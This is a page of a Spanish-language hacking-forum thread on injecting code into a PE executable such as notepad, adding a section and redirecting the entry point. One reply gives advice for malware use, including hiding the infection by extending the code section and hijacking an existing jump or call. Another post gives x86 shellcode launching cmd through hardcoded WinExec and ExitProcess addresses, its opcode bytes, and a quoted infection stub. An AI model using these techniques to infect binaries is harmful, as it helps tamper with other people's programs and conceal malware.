alguien recuerda como se ejecutaba codigo con runPE como explico ferchu?

Iniciado por Belial & Grimoire, 23 Junio 2013, 02:12 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2
Acciones del Usuario

x64core

#10
16 Julio 2013, 23:03 PM
Pense que estabas codificandolo,

Primero el codigo en ensamblador es para generar una entera imagen PE, lo que necesitas es un tipo de shellcode, un codigo independiente,
sin cabeceras , y que pueda valerse sin la informacion de las cabeceras y directorios de una imagen PE. en tu codigo usas importaciones directas
del directorio lo que necesitas es obtener los puntero a la funciones escaneando la tabla de exportaciones del modulo, este articulo lo explica bien
http://blog.harmonysecurity.com/2009_06_01_archive.html
tambien vi algunos codigos aqui en el foro.

notepad con una nueva sección de tamano 0x300 y aligneado a 0x400 para que puedas verificar como funciona lo de la alineacion.
http://www.sendspace.com/file/g3ke1a

el campo AddressOfEntryPoint de una imagen PE, es el que indica donde se encuentra la primera instruccion del ejecutable, este es
una direccion virtual. yo he agregado unos NOPs luego un ret, lo que debes hacer es agregar tu codigo en tal punto.

Debido a que yo no se si esto es para aprender como funciona, para usarlo en malware ,etc. mas cosas pueden ser hechas, por ejemlo
si es para malware entonces debes de deriguir al original punto de entrada para que todo funcione bien, de esta manera primero se
ejecutara tu codigo luego se redireccionara al original punto y el programa se ejecutara normalmente.

Todo esto es explicado en el enlace al manual que deje, y es posible que quieras mirar el proposito de BaseOfCode de una imagen PE,
No lo se depende de lo que quieras.

Ademas, hay muchas maneras de hacer este tipo de cosas.
para malware agregar una sección de esta manera no es nada  y muy sospechoso, yo prefiero alargar la sección de codigo,
no cambiar el punto de entrada, en lugar buscar por un conjunto de instrucciones que nos ayude a ocultar la infeccion, por
ejemplo un JMP directo o indirecto, CALL lo mismo que JMP, RET, o algun salto condicional que no sea corto y redireccionarlo a
nuestro codigo, luego restaurarlo. 


Belial & Grimoire

#11
17 Julio 2013, 04:05 AM
pues ya logre solucionar esa parte, era borrar 28 hexadecimales pero no sobreescribir, sino insertar 28 hexadecimales para colocar la nueva sección asi todo vuelve a su lugar, tambien modifique el PE, antes era E0 - 28 = B8

tambien uso un codigo en asm de una shell

Código (asm) [Seleccionar]
[BITS 32]                 

jmp short cmd                 

init:
   mov edx,7634e695h     
   call edx                           
   mov edx,76312acfh     
   call edx                           
cmd:
   CALL init
   db 'cmd',00h 

al compilarlo me aparece la shell sin ningun problema cambiando las direcciones de WinExec y ExitProcess, suspuse que eso era lo que tenia que agregar en el block, asi que tambien modifique el numero del espacio en la sección, ya que habia puesto 17, y los opcodes son 26

despues de modificar eso, agregue los opcode sacados con ollydbg

Código [Seleccionar]
CPU Disasm
Address   Hex dump          Command                                  Comments
00401000   . /EB 0E         JMP SHORT 00401010
00401002   $ |BA 95E63476   MOV EDX,7634E695
00401007   . |FFD2          CALL EDX
00401009   . |BA CF2A3176   MOV EDX,76312ACF
0040100E   . |FFD2          CALL EDX
00401010   > \E8 EDFFFFFF   CALL 00401002
00401015   .  636D 64       ARPL WORD PTR SS:[EBP+64],BP
00401018   .  00FF          ADD BH,BH


Código [Seleccionar]
EB0EBA95E63476FFD2BACF2A3176FFD2E8EDFFFFFF636D6400FF

pero al ejecutarlo, abre normalmente el block de notas pero no me aparece la shell

leyendo nuevamente el codigo de ferchu pone

Código [Seleccionar]
codigo                                OPcodes

Cadena titulo                         "Soy el notepad y estoy infectado!!!\0"
Cadena msg                            "Infectado!!!\0"
call [siguiente instruccion]          E8 00 00 00 00
pop eax                               58
push 0                                6A 00
sub eax, 0x12                         2C 12
push eax                              50
sub eax, 0x24                         2C 24
push eax                              50
push 0                                6A 00
mov eax, 0x77D5050B                   B8 0B 05 D5 77       // B8 + direccion de MessageBoxA
call eax                              FF D0
mov eax, 0x010739D                    B8 9D 73 00 01       // B8 + entry point
jmp eax                               FF E0

asi que quise agregar B8 a las direcciones, pero tampoco se ejecuta la shell

Código [Seleccionar]
EB0EBAB895E63476FFD2BAB8CF2A3176FFD2E8EDFFFFFF636D6400FF

Código [Seleccionar]
EB0EBA-->B8<--95E63476FFD2BA-->B8<--CF2A3176FFD2E8EDFFFFFF636D6400FF

que podria estar pasando?
.                                 
Imprimir
Ir Arriba Páginas 1 2
Acciones del Usuario